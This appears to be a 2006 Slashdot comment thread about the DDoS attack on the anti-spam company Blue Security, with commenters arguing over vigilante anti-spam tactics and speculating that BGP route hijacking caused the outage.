Got a beef with a spammer, a BIG beef? Get on a plane, go find them, have a nice friendly *discussion* with them, THAT is the only way to solve spam. Screwing over other folks in your petty dick swinging competition is not nice. I know it is popular now with the war modern wars are allegedly fought, that's why I say a pox on ALL their houses as well, too many "god is on our side" idiots out there with advanced weapons who think only "their" side has any legitimate beefs and if any "inconvenient civilians" get in the way it is "too bad". This deal in cyberspace is very similar, so NO, no side is a good guy in this case, no one stuck to the moral or ethical high road or even the intelligent road or even showed the least shred of common courtesy.
Isn't the DDoS tag a little bit redundant for a submission which appears in Slashdot?
Hi - I would just share with you that while searching "blue security" in Google News, I get a list of articles from several sources - that's all fine (/. comes 3rd). The strange thing is that articles from InformationWeek, all seem to have a slant against Blue Securiy, even repeating false allegations. Are they related orenemy companies?
j html?articleID=187200448
...
Example: "InformationWeek, NY - May 5, 2006
The denial-of-service attack that crashed TypePad and LiveJournal this week was caused by anti-spam company Blue Security,"
http://www.informationweek.com/story/showArticle.
Blue Security Denies It's At Fault In Blog Outage
InformationWeek, NY - May 5, 2006
Blue Security's chief executive Friday denied that the server he repointed at a TypePad blog earlier this week brought along a denial of service attack that Blue Security Shoots Itself, And Thousands Of Other People, In The
InformationWeek, NY - May 5, 2006
By Mitch Wagner. When an outfit called Blue Security launched a service to go after spammers with vigilante justice, any idiot could've foreseen big problems.
Isn't it strange?
Looking now, BlueSecurity seems to have moved their operations to Prolexic as of a few hours ago. This will buy them some DDoS protection. Prolexic is based in Miami, and most of my traceroutes are getting lost in Phoenix, but I can't tell if that's something Prolexic is doing or a very clever blackhole.
/. until they hand up indictments to the court and make some arrests.
Netvision also seems to have GlobalXing/AS3549 as a transit provider.
My suspicion (since I don't have a looking glass with a historical search), is that someone with access to the main BGP reflectors inside of either UUNET or GlobalXing managed to make an announcement that they had a local router with a route to AS1680, and then that router just blackholed any traffic to those netblocks. It was happening during the L3/Cogent wars last year, L3 was announcing Cogent netblocks, and blackholing the traffic. If one major backbone such as UUNet makes a false BGP announcement, it could effectively block much traffic from the US to Israel, but European sites would still mostly see Israel as closer.
My next best theory is that someone at LimeLight Networks(AS3549, a GLBX reseller) is sending poison BGP announcements, but I don't see any in looking glasses.
That kind of technically advanced activity, especially with the potential for huge economic losses, should trigger an FBI investigation. Of course, the FBI isn't going to admit anything or post updates on
the AC
Hemos is like...sci-fi fans;he thinks technology is cool, but he hasn't bothered to understand the science it's based on
Background
Burch = http://www.spamhaus.org/rokso/listing.lasso?-op=c
Brown = http://www.spamhaus.org/rokso/listing.lasso?-op=c
Bragging rights aka self-incriminating evidence:
http://www.specialham.com
That's it, my homework assignment is done. Now can I watch the Simpsons, please Daddy? Pretty please?
Phew! And I thought they were the big boys. They'd have enough checks in place to take care of a situation like this. Could they (Tucows) have actually done something to prevent this exploit? Or is it a weakness of the underlying system?
I remember reading another post on slashdot quite sometime ago where they described how partypoker.com (or some site like that) faced a DDoS hit.
PS: Any ideas if microsoft.com would be vunerable to an attack like this? If yes, they must be doling out ransom by the millions!
Great link, great read. Now I see why Blue Security moved their operation under the DDOS protection of Prolexic.
Dyslexics of the world untie!
Finally those B**tards are getting what they deserve, Blue has done something that no other company has been able to do... after reading this and the article at http://www.ezee.se/blog/ I'm just waiting for them to accept my application to join the fight!
E _FROG_ILLEGALLY_SPAMMING_AND_DDOSING_INNOCENT_SITE S.html
If the above does not work, try this:
http://www.ezee.se/blog/blog-2-BLUE_SECURITYS_BLU
I finished downloading the frog and its installed....but not active because my application is still wait listed i guess.
Go frog go!
How many of you, who were already subscribed before the attack can still use you client without problems?
It seems like the member section of BS site is down ATM for maintanace. Check http://members.bluesecurity.com/cwa
Smith & Wesson: The original point and click interface
He's a very bright boy and emails his teacher and his grand mother. I Will defend Blue Security and will offer money to help support them. I would defent them even if they went to this "Pharmamaster or what ever his/their name is and shot him. i just signed up here ( seems to be a great site ) but getting the password emailed to me was a hassle thanks to 64 spam emails coming along with it. Blue Security If you get any of this i also own many websites and would offer your traffic as long as you can develop a way to rotate the DNS so that one site doesn't carry all of the load !!! FIGHT BACK !!!